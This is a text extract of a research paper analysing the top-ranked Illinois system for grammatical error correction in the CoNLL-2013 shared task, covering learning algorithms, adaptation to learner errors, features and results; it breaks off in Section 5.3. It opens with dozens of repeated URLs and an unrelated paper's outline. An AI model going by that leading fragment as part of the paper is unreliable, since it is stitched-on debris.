http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf http://dx.doi.org/10.7717/peerj-cs.8 What should we know to develop an information robot? Introduction Related Works Information-providing robots Direction-giving interaction Engagement Knowledge representation Information in a Shopping Mall Daily tasks of information service Expectations from information robot Requirements System Architecture Knowledge representation Behavior controller Dialog manager Other modules Preliminary trials: Lack of `Knowledge' for Interaction Field Experiment Experiment 1 Experiment 2 Evaluation of system performance Limitation Conclusion Acknowledgements References work_pdhkjvfkbnb4ngi7bpbilobcq4 ---- Building a State-of-the-Art Grammatical Error Correction System Alla Rozovskaya Center for Computational Learning Systems Columbia University New York, NY 10115 alla@ccls.columbia.edu Dan Roth Department of Computer Science University of Illinois Urbana, IL 61801 danr@illinois.edu Abstract This paper identifies and examines the key principles underlying building a state-of-the- art grammatical error correction system. We do this by analyzing the Illinois system that placed first among seventeen teams in the re- cent CoNLL-2013 shared task on grammatical error correction. The system focuses on five different types of errors common among non-native English writers. We describe four design principles that are relevant for correcting all of these er- rors, analyze the system along these dimen- sions, and show how each of these dimensions contributes to the performance. 1 Introduction The field of text correction has seen an increased interest in the past several years, with a focus on correcting grammatical errors made by English as a Second Language (ESL) learners. Three competi- tions devoted to error correction for non-native writ- ers took place recently: HOO-2011 (Dale and Kil- garriff, 2011), HOO-2012 (Dale et al., 2012), and the CoNLL-2013 shared task (Ng et al., 2013). The most recent and most prominent among these, the CoNLL-2013 shared task, covers several common ESL errors, including article and preposition usage mistakes, mistakes in noun number, and various verb errors, as illustrated in Fig. 1.1 Seventeen teams that 1The CoNLL-2014 shared task that completed at the time of writing this paper was an extension of the CoNLL-2013 com- petition (Ng et al., 2014) but addressed all types of errors. The Illinois-Columbia submission, a slightly extended version of the Nowadays *phone/phones *has/have many functionalities, *included/including *∅/a camera and *∅/a Wi-Fi receiver. Figure 1: Examples of representative ESL errors. participated in the task developed a wide array of ap- proaches that include discriminative classifiers, lan- guage models, statistical machine-translation sys- tems, and rule-based modules. Many of the systems also made use of linguistic resources such as addi- tional annotated learner corpora, and defined high- level features that take into account syntactic and se- mantic knowledge. Even though the systems incorporated similar re- sources, the scores varied widely. The top system, from the University of Illinois, obtained an F1 score of 31.202, while the second team scored 25.01 and the median result was 8.48 points.3 These results suggest that there is not enough understanding of what works best and what elements are essential for building a state-of-the-art error correction system. In this paper, we identify key principles for build- ing a robust grammatical error correction system and show their importance in the context of the shared task. We do this by analyzing the Illinois system and evaluating it along several dimensions: choice Illinois CoNLL-2013 system, ranked at the top. For a descrip- tion of the Illinois-Columbia submission, we refer the reader to Rozovskaya et al. (2014a). 2The state-of-the-art performance of the Illinois system dis- cussed here is with respect to individual components for differ- ent errors. Improvements in Rozovskaya and Roth (2013) over the Illinois system that are due to joint learning and inference are orthogonal, and the analysis in this paper still applies there. 3F1 might not be the ideal metric for this task but this was the one chosen in the evaluation. See more in Sec. 6. 419 Transactions of the Association for Computational Linguistics, 2 (2014) 419–434. Action Editor: Alexander Koller. Submitted 10/2013; Revised 6/2014; Published 10/2014. c©2014 Association for Computational Linguistics. of learning algorithm; choice of training data (native or annotated learner data); model adaptation to the mistakes made by the writers; and the use of linguis- tic knowledge. For each dimension, several imple- mentations are compared, including, when possible, approaches chosen by other teams. We also vali- date the obtained results on another learner corpus. Overall, this paper makes two contributions: (1) we explain the success of the Illinois system, and (2) we provide an understanding and qualitative analysis of different dimensions that are essential for success in this task, with the goal of aiding future research on it. Given that the Illinois system has been the top system in four competitive evaluations over the last few years (HOO and CoNLL), we believe that the analysis we propose will be useful for researchers in this area. In the next section, we present the CoNLL-2013 competition. Sec. 3 gives an overview of the ap- proaches adopted by the top five teams. Sec. 4 de- scribes the Illinois system. In Sec. 5, the analysis of the Illinois system is presented. Sec. 6 offers a brief discussion, and Sec. 7 concludes the paper. 2 Task Description The CoNLL-2013 shared task focuses on five common mistakes made by ESL writers: arti- cle/determiner, preposition, noun number, verb agreement, verb form. The training data of the shared task is the NUCLE corpus (Dahlmeier et al., 2013), which contains essays written by learners of English (we also refer to it as learner data or shared task training data). The test data consists of 50 essays by students from the same linguistic back- ground. The training and the test data contain 1.2M and 29K words, respectively. Table 1 shows the number of errors by type and the error rates. Determiner errors are the most com- mon and account for 42.1% of all errors in training. Note that the test data contains a much larger pro- portion of annotated mistakes; e.g. determiner errors occur four times more often in the test data than in the training data (only 2.4% of noun phrases in the training data have determiner errors, versus 10% in the test data). The differences might be attributed to differences in annotation standards, annotators, or writers, as the test data was annotated at a later time. The shared task provided two sets of test an- Error Number of errors and error rates Train Test Art. 6658 (2.4%) 690 (10.0%) Prep. 2404 (2.0%) 311 (10.7%) Noun 3779 (1.6%) 396 (6.0%) Verb agr. 1527 (2.0%) 124 (5.2%) Verb form 1453 (0.8%) 122 (2.5%) Table 1: Statistics on annotated errors in the CoNLL-2013 shared task data. Percentage denotes the error rates, i.e. the number of erroneous instances with respect to the total number of relevant instances in the data. notations: the original annotated data and a set with additional revisions that also includes alternative an- notations proposed by participants. Clearly, having alternative answers is the right approach as there are typically multiple ways to correct an error. How- ever, because the alternatives are based on the error analysis of the participating systems, the revised set may be biased (Ng et al., 2013). Consequently, we report results on the original set. 3 Model Dimensions Table 2 summarizes approaches and methodologies of the top five systems. The prevailing approach consists in building a statistical model either on learner data or on a much larger corpus of native En- glish data. For native data, several teams make use of the Web 1T 5-gram corpus (henceforth Web1T, (Brants and Franz, 2006)). NARA employs a statis- tical machine translation model for two error types; two systems have rule-based components for se- lected errors. Based on the analysis of the Illinois system, we identify the following, inter-dependent, dimensions that will be examined in this work: 1. Learning algorithm: Most of the teams, includ- ing Illinois, built statistical models. We show that the choice of the learning algorithm is very impor- tant and affects the performance of the system. 2. Adaptation to learner errors: Previous stud- ies, e.g. (Rozovskaya and Roth, 2011) showed that adaptation, i.e. developing models that utilize knowledge about error patterns of the non-native writers, is extremely important. We summarize adaptation techniques proposed earlier and examine their impact on the performance of the system. 3. Linguistic knowledge: It is essential to use some linguistic knowledge when developing error correc- tion modules, e.g., to identify which type of verb 420 System Error Approach Illinois (Rozovskaya et al., 2013) Art. AP model on NUCLE with word, POS, shallow parse features Prep. NB model trained on Web1T and adapted to learner errors Noun/Agr./Form NB model trained on Web1T NTHU (Kao et al., 2013) All Count model with backoff trained on Web1T HIT (Xiang et al., 2013) Art./Prep./Noun ME on NUCLE with word, POS, dependency features Agr./Form Rule-based NARA (Yoshimoto et al., 2013) Art./Prep. SMT model trained on learner data from Lang-8 corpus Noun ME model on NUCLE with word, POS and dependency features Agr./Form Treelet LM on Gigaword and Penn TreeBank corpora UMC (Xing et al., 2013) Art./Prep. Two LMs – on NUCLE and Web1T corpus – with voting Noun Rules and ME model on NUCLE + LM trained on Web1T Agr./Form ME model on NUCLE (agr.) and rules (form) Table 2: Top systems in the CoNLL-2013 shared task. The second column indicates the error type; the third column describes the approach adopted by the system. ME stands for Maximum Entropy; LM stands for language model; SMT stands for Statistical Machine Translation; AP stands for Averaged Perceptron; NB stands for Naı̈ve Bayes. Classifier Art. Prep. Noun Agr. Form Train 254K 103K 240K 75K 175K Test 6K 2.5K 2.6K 2.4K 4.8K Table 3: Number of candidate words by classifier type. error occurs in a given context, before the appropri- ate correction module is employed. We describe and evaluate the contribution of these elements. 4. Training data: We discuss the advantages of training on learner data or native English data in the context of the shared task and in broader context. 4 The Illinois System The Illinois system consists of five machine-learning models, each specializing in correcting one of the er- rors described above. The words that are selected as input to a classifier are called candidates (Table 3). In the preposition system, for example, candidates are determined by surface forms. In other systems, determining the candidates might be more involved. All modules take as input the corpus documents pre-processed with a part-of-speech tagger4 (Even- Zohar and Roth, 2001) and shallow parser5 (Pun- yakanok and Roth, 2001). In the Illinois submis- sion, some modules are trained on native data, oth- ers on learner data. The modules trained on learner data make use of a discriminative algorithm, while 4http://cogcomp.cs.illinois.edu/page/ software view/POS 5http://cogcomp.cs.illinois.edu/page/ software view/Chunker native-trained modules make use of the Naı̈ve Bayes (NB) algorithm. The Illinois system has an option for a post-processing step where corrections that al- ways result in a false positive in training are ignored but this option is not used here. 4.1 Determiner Errors The majority of determiner errors involve articles, although some errors also involve pronouns. The Illinois system addresses only article errors. Can- didates include articles (“a”,“an”,“the”)6 and omis- sions, by considering noun-phrase-initial contexts where an article is likely to be omitted. The con- fusion set for articles is thus {a, the, ∅}. The ar- ticle classifier is the same as the one in the HOO shared tasks (Rozovskaya et al., 2012; Rozovskaya et al., 2011), where it demonstrated superior per- formance. It is a discriminative model that makes use of the Averaged Perceptron algorithm (AP, (Fre- und and Schapire, 1996)) implemented with LBJava (Rizzolo and Roth, 2010) and is trained on learner data with rich features and adaptation to learner er- rors. See Sec. 5.2 and Sec. 5.3. 4.2 Preposition Errors Similar to determiners, we distinguish three types of preposition mistakes: choosing an incorrect prepo- sition, using a superfluous preposition, and omitting a preposition. In contrast to determiners, for learn- ers of many first language backgrounds, most of the preposition errors are replacements, i.e., where the 6The variants “a” and “an” are collapsed to one class. 421 “Hence, the environmental factors also *contributes/ contribute to various difficulties, *giving/given prob- lems in nuclear technology.” Error Confusion set Agr. {INF=contribute, S=contributes} Form {INF=give, ED=given, ING=giving, S=gives } Table 4: Confusion sets for agreement and form. For irreg- ular verbs, the second candidate in the confusion set for Verb form is the past participle. author correctly recognized the need for a prepo- sition, but chose the wrong one (Leacock et al., 2010). However, learner errors depend on the first language; in NUCLE, spurious prepositions occur more frequently: 29% versus 18% of all preposition mistakes in other learner corpora (Rozovskaya and Roth, 2010a; Yannakoudakis et al., 2011). The Illinois preposition classifier is a NB model trained on Web1T that uses word n-gram features in the 4-word window around the preposition. The 4-word window refers to the four words before and the four words after the preposition, e.g. “problem as the search of alternative resources to the” for the preposition “of”. Features consist of word n-grams of various lengths spanning the target preposition. For example, “the search of” is a 3-gram feature. The model is adapted to likely preposition confu- sions using the priors method (see Sec. 5.2). The Illinois model targets replacement errors of the 12 most common English prepositions. Here we aug- ment it to identify spurious prepositions. The con- fusion set for prepositions is as follows: {in, of, on, for, to, at, about, with, from, by, into, during, ∅}. 4.3 Agreement and Form Errors The Illinois system implements two verb modules – agreement and form – that consist of the following components: (1) candidate identification; (2) deter- mining the relevant module for each candidate based on verb finiteness; (3) correction modules for each error type. The confusion set for verbs depends on the target word and includes its morphological vari- ants (Table 4). For irregular verbs, the past partici- ple form is included, while the past tense form is not (i.e. “given” is included but “gave” is not), since tense errors are not part of the task. To generate morphological variants, the system makes use of a morphological analyzer verbMorph; it assumes (1) a list of valid verb lemmas (compiled using a POS- Dimension Systems used in the comparison Learn. alg. (Sec. 5.1) NTHU, UMC Adaptation (Sec. 5.2) Error inflation: HIT Ling. knowledge Cand. identification: NTHU, HIT (Sec. 5.3) Verb finiteness: NTHU Train. data (Sec. 5.4) HIT, NARA Table 5: System comparisons. Column 1 indicates the di- mension, and column 2 lists systems whose approaches provide a relevant point of comparison. tagged version of the NYT section of the Gigaword corpus) and (2) a list of irregular English verbs.7 Candidate Identification stage selects the set of words that are presented as input to the classifier. This is a crucial step: errors missed at this stage will not be detected by the later stages. See Sec. 5.3. Verb Finiteness is used in the Illinois system to sep- arately process verbs that fulfill different grammati- cal functions and thus are marked for different gram- matical properties. See Sec. 5.3. Correction Modules The agreement module is a bi- nary classifier. The form module is a 4-class system. Both classifiers are trained on the Web1T corpus. 4.4 Noun Errors Noun number errors involve confusing singular and plural noun forms (e.g. “phone” instead of “phones” in Fig. 1) and are the second most common error type in the NUCLE corpus after determiner mistakes (Table 1). The Illinois noun module is trained on the Web1T corpus using NB. Similar to verbs, candi- date identification is an important step in the noun classifier. See Sec. 5.3. 5 System Analysis In this section, we evaluate the Illinois system along the four dimensions identified in Sec. 3, compare its components to alternative configurations imple- mented by other teams, and present additional exper- iments that further analyze each dimension. While a direct comparison with other systems is not always possible due to other differences between the sys- tems, we believe that these results are still useful. Table 5 lists systems used for comparion. It is im- portant to note that the dimensions are not indepen- dent. For instance, there is a correlation between algorithm choice and training data. 7The tool and more detail about it can be found at http://cogcomp.cs.illinois.edu/page/publication view/743 422 Results are reported on the test data using F1 com- puted with the CoNLL scorer (Dahlmeier and Ng, 2012). Error-specific results are generated based on the output of individual modules. Note that these are not directly comparable to error-specific results in the CoNLL overview paper: the latter are approx- imate as the organizers did not have the error type information for corrections in the output. The com- plete system includes the union of corrections made by each of these modules, where the corrections are applied in order. Ordering overlapping candidates8 might potentially affect the final output, when mod- ules correctly identify an error but propose differ- ent corrections, but this does not happen in practice. Modules that are part of the Illinois submission are marked with an asterisk in all tables. To demonstrate that our findings are not spe- cific to CoNLL, we also show results on the FCE dataset. It is produced by learners from seventeen first language backgrounds and contains 500,000 words from the Cambridge Learner Corpus (CLC) (Yannakoudakis et al., 2011). We split the corpus into two equal parts – training and test. The statis- tics are shown in Appendix Tables A.16 and A.17. 5.1 Dim. 1: Learning Algorithm Rozovskaya and Roth (2011, Sec. 3) discuss the re- lations between the amount of training data, learn- ing algorithms, and the resulting performance. They show that on training sets of similar sizes, discrimi- native classifiers outperform other machine learning methods on this task. Following these results, the Illinois article module that is trained on the NUCLE corpus uses the discriminative approach AP. Most of the other teams that train on the NUCLE corpus also use a discriminative method. However, when a very large native training set such as the Web1T corpus is available, it is often ad- vantageous to use it. The Web1T corpus is a collec- tion of n-gram counts of length one to five over a cor- pus of 1012 words. Since the corpus does not come with complete sentences, it is not straightforward to make use of a discriminative classifier because of the limited window provided around each example: training a discriminative model would limit the sur- 8Overlapping candidates are included in more than one module: if “work” is tagged as NN, it is included in the noun module, but also in the form module (as a valid verb lemma). rounding context features to a 2-word window. Be- cause we wish to make use of the context features that extend beyond the 2-word window, it is only possible to use count-based methods, such as NB or LM. Several teams make use of the Web1T corpus: UMC uses a count-based LM for article, preposition, and noun number errors; NTHU addresses all errors with a count-based model with backoff, which is es- sentially a variation of a language model with back- off. The Illinois system employs the Web1T corpus for all errors, except articles, using NB. Training Naı̈ve Bayes for Deletions and Inser- tions The reason for not using the Web1T corpus for article errors is that training NB on Web1T for deletions and insertions presents a problem, and the majority of article errors are of this type. Recall that Web1T contains only n-gram counts, which makes it difficult to estimate the prior count for the ∅ candi- date. (With access to complete sentences, the prior of ∅ is estimated by counting the total number of ∅ candidates; e.g., in case of articles, the number of NPs with ∅ article is computed.) We solve this prob- lem by treating the article and the word following it as one target. For instance, to estimate prior counts for the article candidates in front of the word “cam- era” in “including camera”, we obtain counts for “camera”, “a camera”, “the camera”. In the case of the ∅ candidate, the word “camera” acts as the tar- get. Thus, the confusion set for the article classifier is modified as follows: instead of the three articles (as shown in Sec. 4.1), each member of the confu- sion set is a concatenation of the article and the word that follows it, e.g. {a camera, the camera, cam- era}. The counts for contextual features are obtained similarly, e.g. a feature that includes a preceding word would correspond to the count of “including x”, where x can take any value from the confusion set. The above solution allows us to train NB for ar- ticle errors and to extend the preposition classifier to handle extraneous preposition errors (Table 6). Rozovskaya and Roth (2011) study several algo- rithms trained on the Web1T corpus and observe that, when evaluated with the same context win- dow size, NB performs better than other count-based methods. In order to show the impact of the algo- rithm choice, in Table 6, we compare LM and NB models. Both models use word n-grams spanning the target word in the 4-word window. We train LMs 423 Error Model F1 CoNLL FCE Art. LM 21.11 24.15 NB 32.45 30.78 Prep. LM 12.09 30.01 NB 14.04 29.40 Noun LM 40.72 32.41 NB* 42.60 34.40 Agr. LM 20.65 33.53 NB* 26.46 36.42 Form LM 13.40 08.46 NB* 14.50 12.16 Table 6: Comparison of learning models. Web1T corpus. Modules that are part of the Illinois submission are marked with an asterisk. Source Candidates ED INF ING S ED 0.99675 0.00192 0.00103 0.00030 INF 0.00177 0.99630 0.00168 0.00025 ING 0.00124 0.00447 0.99407 0.00022 S 0.00054 0.00544 0.00132 0.99269 Table 7: Priors confusion matrix used for adapting NB. Each entry shows Prob(candidate|source), where source corre- sponds to the verb form chosen by the author. with SRILM (Stolcke, 2002) using Jelinek-Mercer linear interpolation as a smoothing method (Chen and Goodman, 1996). On the CoNLL test data, NB outperforms LM on all errors; on the FCE corpus, NB is superior on all errors, except preposition er- rors, where LM outperforms NB only very slightly. We attribute this to the fact that the preposition prob- lem has more labels; when there is a big confusion set, more features have default smooth weights, so there is no advantage to running NB. We found that with fewer classes (6 rather than 12 prepositions), NB outperforms LM. It is also possible that when we have a lot of labels, the theoretical difference be- tween the algorithms disappears. Note that NB can be improved via adaptation (next section) and then it outperforms the LM also for preposition errors. 5.2 Dim. 2: Adaptation to Learner Errors In the previous section, the models were trained on native data. These models have no notion of the er- ror patterns of the learners. Here we discuss model adaptation to learner errors, i.e. developing models that utilize the knowledge about the types of mis- takes learners make. Adaptation is based on the fact that learners make mistakes in a systematic manner, e.g. errors are influenced by the writer’s first lan- guage (Gass and Selinker, 1992; Ionin et al., 2008). There are different ways to adapt a model that de- pend on the type of training data (learner or native) and the algorithm choice. The key application of adaptation is for models trained on native English data, because the learned models do not know any- thing about the errors learners make. With adapta- tion, models trained on native data can use the au- thor’s word (the source word) as a feature and thus propose a correction based on what the author orig- inally wrote. This is crucial, as the source word is an important piece of information (Rozovskaya and Roth, 2010b). Below, several adaptation techniques are summarized and evaluated. The Illinois system makes use of adaptation in the article model via the inflation method and adapts its NB preposition clas- sifier trained on Web1T with the priors method. Adapting NB The priors method (Rozovskaya and Roth, 2011, Sec. 4) is an adaptation technique for a NB model trained on native English data; it is based on changing the distribution of priors over the cor- rection candidates. Candidate prior is a special pa- rameter in NB; when NB is trained on native data, candidate priors correspond to the relative frequen- cies of the candidates in the native corpus and do not provide any information on the real distribution of mistakes and the dependence of the correction on the word used by the author. In the priors method, candidate priors are changed using an error confusion matrix based on learner data that specifies how likely each confusion pair is. Table 7 shows the confusion matrix for verb form errors, computed on the NUCLE data. Adapted pri- ors are dependent on the author’s original verb form used: let s be a form of the verb appearing in the source text, and c a correction candidate. Then the adapted prior of c given s is: prior(c|s) = C(s, c) C(s) where C(s) denotes the number of times s appeared in the learner data, and C(s, c) denotes the number of times c was the correct form when s was used by a writer. The adapted priors differ by the source: the probability of candidate INF when the source form is S, is more than twice than when the source form is 424 Error Model F1 CoNLL FCE Train Test Art. NB 18.28 32.45 30.78 NB-adapted 19.18 34.49 31.76 Prep. NB 09.03 14.04 29.40 NB-adapted* 10.94 12.14 32.22 Noun NB* 23.06 42.60 34.40 NB-adapted 22.89 42.31 32.38 Agr. NB* 16.72 26.46 36.42 NB-adapted 17.62 23.46 38.57 Form NB* 11.93 14.50 12.16 NB-adapted 14.63 18.35 16.67 Table 8: Adapting NB with the priors method. All models are trained on the Web1T corpus. Modules that are part of the Illinois submission are marked with an asterisk. ED; the probability that S is the correct form is very high, which reflects the low error rates. Table 8 compares NB and NB-adapted models. Because of the dichotomy in the error rates in CoNLL training and test data, we also show exper- iments using 5-fold cross-validation on the training data. Adaptation always helps on the CoNLL train- ing data and the FCE data (except noun errors), but on the test data it only helps on article and verb form errors. This is due to discrepancies in the error rates, as adaptation exploits the property that learner errors are systematic. Indeed, when priors are estimated on the test data (in 5-fold cross-validation), the perfor- mance improves, e.g. the preposition module attains an F1 of 18.05 instead of 12.14. Concerning lack of improvement on noun num- ber errors, we hypothesize that these errors differ from the other mistakes in that the appropriate form strongly depends on the surface form of the noun, which would, in turn, suggest that the dependency of the label on the grammatical form of the source that the adaptation is trying to discover is weak. In- deed, the prior distribution of {singular, plural} la- bel space does not change much when the source feature is taken into account. The unadapted priors for “singular” and “plural” are 0.75 and 0.25, respec- tively. Similarly, the adapted priors (singular|plural) and (plural|singular) are 0.034 and 0.016, respec- tively. In other words, the unadapted prior probabil- ity for “plural” is three times lower than for “singu- lar”, which does not change much with adaptation. This is different for other errors. For instance, in case of verb agreement, the unadapted prior for “plu- ral” is 0.617, more than three times than the “sin- gular” prior of 0.20. With adaptation, these priors become almost the same (0.016 and 0.012). Adapting AP The AP is a discriminative learning algorithm and does not use priors on the set of can- didates. In order to reflect our estimate of the error distribution, the AP algorithm is adapted differently, by introducing into the native data artificial errors, in a rate that reflects the errors made by the ESL writers (Rozovskaya and Roth, 2010b). The idea is to simulate learner errors in training, through arti- ficial mistakes (also produced using an error confu- sion matrix).9 The original method was proposed for models trained on native data. This technique can be further enhanced using the error inflation method (Rozovskaya et al., 2012, Sec. 6) applied to models trained on native or learner data. The Illinois system uses error inflation in its ar- ticle classifier. Because this classifier is trained on learner data, the source article can be used as a fea- ture. However, since learner errors are sparse, the source feature encourages the model to abstain from flagging a mistake, which results in low recall. The error inflation technique addresses this problem by boosting the proportion of errors in the training data. It does this by generating additional artificial errors using the error distribution from the training set. Table 9 shows the results of adapting the AP clas- sifier using error inflation. (We omit noun results, since the noun AP model performs better without the source feature, which is similar to the noun NB model, as discussed above.) The inflation method improves recall and, consequently, F1. It should be noted that although inflation also decreases preci- sion it is still helpful. In fact, because of the low error rates, performance on the CoNLL dataset with natural errors is very poor, often resulting in F1 be- ing equal to 0 due to no errors being detected. Inflation vs. Sampling To demonstrate the impact of error inflation, we compare it against sampling, an approach used by other teams – e.g. HIT – that improves recall by removing correct examples in training. The HIT article model is similar to the 9The idea of using artificial errors goes back to Izumi et al. (2003) and was also used in Foster and Andersen (2009). The approach discussed here refers to the adaptation method in Ro- zovskaya and Roth (2010b) that generates artificial errors using the distribution of naturally-occurring errors. 425 Error Model F1 CoNLL FCE Art. AP (natural errors) 07.06 27.65 AP (infl. const. 0.9)* 24.61 30.96 Prep. AP (natural errors) 0.0 14.69 AP (infl. const. 0.7) 07.37 34.77 Agr. AP (natural errors) 0.0 08.05 AP (infl. const. 0.8) 17.06 31.03 Form AP (natural errors) 0.0 01.56 AP (infl. const. 0.9) 10.53 09.43 Table 9: Adapting AP using error inflation. Models are trained on learner data with word n-gram features and the source feature. Inflation constant shows how many correct instances remain (e.g. 0.9 indicates that 90% of correct examples are un- changed, while 10% are converted to mistakes.) Modules that are part of the Illinois submission are marked with an asterisk. Infl. constant F1 Sampling Inflation 0.90 23.22 24.61 0.85 27.75 29.29 0.80 30.04 33.47 0.70 33.02 35.52 0.60 32.78 35.03 Table 10: Comparison of the inflation and sampling meth- ods on article errors (CoNLL). The proportion of errors in training in each row is identical. Illinois model but scored three points below. Ta- ble 10 shows that sampling falls behind the inflation method, since it considerably reduces the training size to achieve similar error rates. The proportion of errors in training in each row is identical: sampling achieves the error rates by removing correct exam- ples, whereas the inflation method converts some positive examples to artificial mistakes. Inflation constant shows how many correct instances remain; smaller inflation values correspond to more erro- neous instances in training; the sampling approach, correspondingly, removes more positive examples. To summarize, we have demonstrated the impact of error inflation by comparing it to a similar method used by another team; we have also shown that fur- ther improvements can be obtained by adapting NB to learner errors using the priors method, when train- ing and test data exhibit similar error patterns. 5.3 Dim. 3: Linguistic Knowledge The use of linguistic knowledge is important in sev- eral components of the error correction system: fea- ture engineering, candidate identification, and spe- Error Features F1 CoNLL FCE Art. n-gram 24.61 30.96 n-gram+POS+chunk* 33.50 35.66 Agr. n-gram 17.06 31.03 n-gram+POS 24.14 35.29 n-gram+POS+syntax 27.93 41.23 Table 11: Feature evaluation. Models are trained on learner data, use the source word and error inflation. Modules that are part of the Illinois submission are marked with an asterisk. cial techniques for correcting verb errors. Features It is known from many NLP tasks that feature engineering is important, and this is the case here. Note that this is relevant only when training on learner data, as models trained on Web1T can make use of n-gram features only but for the NUCLE cor- pus we have several layers of linguistic annotation.10 We found that for article and agreement errors, using deeper linguistic knowledge is especially beneficial. The article features in the Illinois module, in addi- tion to the surface form of the context, encode POS and shallow parse properties. These features are pre- sented in Rozovskaya et al. (2013, Table 3) and Ap- pendix Table A.19. The Illinois agreement module is trained on Web1T but further analysis reveals that it is better to train on learner data with rich features. The word n-gram and POS agreement features are the same as those in the article module. Syntactic features encode properties of the subject of the verb and are presented in Rozovskaya et al. (2014b, Table 7) and Appendix Table A.18; these are based on the syntactic parser (Klein and Manning, 2003) and the dependency converter (Marneffe et al., 2006). Table 11 shows that adding rich features is help- ful. Notably, adding deeper syntactic knowledge to the agreement module is useful, although parse features are likely to contain more noise.11 Foster (2007) and Lee and Seneff (2008) observe a degrade in performance on syntactic parsers due to grammat- ical noise that also includes agreement errors. For articles, we chose to add syntactic knowledge from shallow parse as it is likely to be sufficient for arti- cles and more accurate than full-parse features. Candidate Identification for errors on open-class 10Feature engineering will also be relevant when training on a native corpus that has linguistic annotation. 11Parse features have also been found useful in preposition error correction (Tetreault et al., 2010). 426 words is rarely discussed but is a crucial step: it is not possible to identify the relevant candidates us- ing a closed list of words, and the procedure needs to rely on pre-processing tools, whose performance on 